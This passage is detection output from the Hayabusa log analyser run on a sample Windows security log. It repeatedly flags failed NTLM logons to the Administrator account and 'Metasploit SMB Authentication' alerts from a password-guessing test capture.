SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: 
